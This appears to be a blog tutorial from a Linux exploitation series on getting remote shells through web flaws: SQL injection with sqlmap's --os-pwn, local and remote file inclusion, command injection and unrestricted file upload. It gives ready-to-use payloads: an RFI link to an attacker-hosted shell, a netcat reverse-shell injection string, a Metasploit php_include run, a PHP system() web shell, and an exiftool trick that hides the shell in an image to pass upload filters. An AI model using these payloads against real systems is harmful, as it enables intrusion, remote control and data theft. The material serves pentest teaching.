Linux Exploitation 9.2

Approaches to Web Exploitation

Introduction

In this blog post we will learn about web exploitation to get a remote shell on the target system, we will exploit some vulnerabilities that can compromise target system, like SQLi, File inclusion, Command injection, File Upload.

Before this, I want to explain to you some basics about shells.

Reverse Shell and Bind Shell

Bind shell

Its a type of shell in which the target machine set a listener or opens up a connection on the target machine and waits for an incoming the request of connection.

Reverse shell

It’s opposite to bind shell, in reverse shell target machine requests back to the attacker machine that listening to a connection, to set a connection. In the reverse shell, the attacker machine listens for a connection.

The basic use of both of them is to take access to the target system, to execute and perform malicious actions on target.

Web Backdoor

A web backdoor is the attacker’s uploaded script on the target web application to get remote access on target.

SQL injection

SQL injection is a type of attack in which an attacker can inject his arbitrary SQL queries as an input, to get his desired output as a result.

The reason behind this vulnerability is improper input sanitization and trust on user-supplied input.

It not only affects web applications even it can compromise the web server also.

We will exploit SQLi to get access to the target system. We will use the SQL map for this purpose, there are also many manual options to server takeover that we will discuss later.

Sqlmap

It’s a powerful SQL injection tool used to exploit types of SQL vulnerabilities automatically in the target system.

# man sqlmap

# sqlmap -h

Sqlmap comes preconfigured in ParrotOS

Suppose you find SQL vulnerability in web applications while performing previous phases testing.

And the URL is :

https://www.target.com/user/profile?id=1

We will use sqlmap to exploit the ‘id’ parameter, as we found it vulnerable to SQLi.

# sqlmap -u https://www.target.com/user/profile?id=1 --dbs

This will enumerate all databases in and give us valuable results about data stored.

Suppose we got database result:

targetcorp
phpmyadmmin
information_schema
mysql

Now we got databases, let’ use os pwn feature to get the access to web server.

# sqlmap -u https://www.target.com/user/profile?id=1 -D targetcorp --os-pwn

It will ask you some question like

How do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - icmp tunneling

select 1

> 1

Like this, you have to select web application language, select language and after that, it will ask you for directory select 1.

After that it will ask for you to want to use, you can use anyone, select 1 for meterpreter, after that, it instantly loads Metasploit framework and gives you meterpreter shell.

We can use other sqlmap feature also the name ‘–os-shell’

# sqlmap -u https://www.target.com/user/profile?id=1 -D targetcorp --os-shell

File Inclusion Vulnerability

There are two types of file inclusion vulnerabilities Local File Inclusion and Remote File Inclusion, depending on where the file to include is located.

The reason behind this vulnerability is ‘include()’ function, where path characters are not stripped from the input, and the input is used as part of an ‘include().

Exploiting Local File Inclusion

In LFI we can include any local file on the web page.

Suppose in previous phases we found an URL is vulnerable to LFI, Now we are going to exploit it.

URL: http://targetcorp.com/index.php?file=welcome.php

Let’s change the URL to our arbitrary file include URL.

URL: http://targetcorp.com/index.php?file=../../../etc/passwd

It will include all the content of /etc/passwd file on the webpage.

Like this, you can include any file, and see the content of that file.

Exploitation of Remote File Inclusion

In RFI we can include any remote file and execute it instead of only inclusion.

In previous phases, we found an URL that is vulnerable to RFI.

URL: http://targetcorp.com/vuln.php?file=

As you can see the parameter ‘file’ is vulnerable to RFI, and we can leverage its remote code execution in the target system.

To exploit this vulnerability we must not include the ‘php’ file in our attacker server, otherwise, it will execute it in the attacker server.

We can simply change the file extension to ‘.txt’ and include it in the target URL, Like this.

http://targetcorp.com/vuln.php?file=atacker.com/shell.txt

We can also use metasploit to exploit these vulnerabilities.

msf5 > use exploit/unix/webapp/php_include
msf5 exploit(unix/webapp/php_include) > show options

It will give options to set, you need to set only a few of them which are required

msf5 exploit(unix/webapp/php_include) > set path vuln.php?file=
path => vuln.php?file=
msf5 exploit(unix/webapp/php_include) > set rhost 10.10.10.123
rhost => 10.10.10.123
msf5 exploit(unix/webapp/php_include) > set rport 443
rport => 443
msf5 exploit(unix/webapp/php_include) > show payloads
msf5 exploit(unix/webapp/php_include) > set payload php/bind_php
payload => php/bind_php
msf5 exploit(unix/webapp/php_include) > run

Boom, you will get meterpreter shell instantly.

Exploiting Command injection

Command injection is the vulnerability, that uses user input to execute arbitrary commands on the webserver. It can also execute the attacker’s payload on the host system.

In previous we have found command injection on the target web application, now we will exploit it and get a reverse shell.

The vulnerable input field is taking IP addresses as input to test their speed, so we will exploit this functionality.

we will first start Netcat listener in attackers system

In the attacker’s machine

# nc -lvp 1337

In target application’s input field

& nc <attacker IP> 4444 -e /bin/bash

And you will get a reverse shell of the target system.

Exploiting File Upload Vulnerability

The Unrestricted file upload vulnerability allows an attacker to upload his malicious file on the target web server and compromise target in the attacker’s desired way.

The reason behind it is not implementing restrictions on files uploaded by the user.

In previous phases, we have found Unrestricted file upload vulnerability on the target web application.

We have a web page which allows us to upload an image

http://target.com/uploadpicture.php

And if we upload an image the image will available on the following URL

http://target.com/pictures/<imagename>

we can easily upload our php backdoor and get remote code execution from it

create a php file with the following code and upload it on the target web

<?php echo "<pre>"; system($_GET['cmd']); ?>

http://target.com/pictures/hackershell.php?cmd=ls

Suppose there is a restriction, we can only upload image files, and web applications are also checking for file content so we also can’t upload files after simply changing its extension.

Now we can use ExifTool

# man exiftool

To make an exif payload we simply append our code to the image

# exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' hackershell.jpg

And copy file to

cp hackershell.jpg hackershell.php.jpg

Now you can upload it successfully

http://target.com/pictures/hackershell.php?cmd=ls

You can also get webshells from your Parrot OS

$ cd /usr/share/webshells

$ls

asp  aspx  cfm  jsp  laudanum  perl  php

We can create payloads using msfvenom as we create in previous modules, or we can also use metasploit framework for every attack above.

Conclusion

We have discussed some web application’s high potential vulnerabilities exploitation, As its not a web pentesting series, we will learn more in upcoming web application pentesting blog series. And the web approaches are the most same for both linux and windows.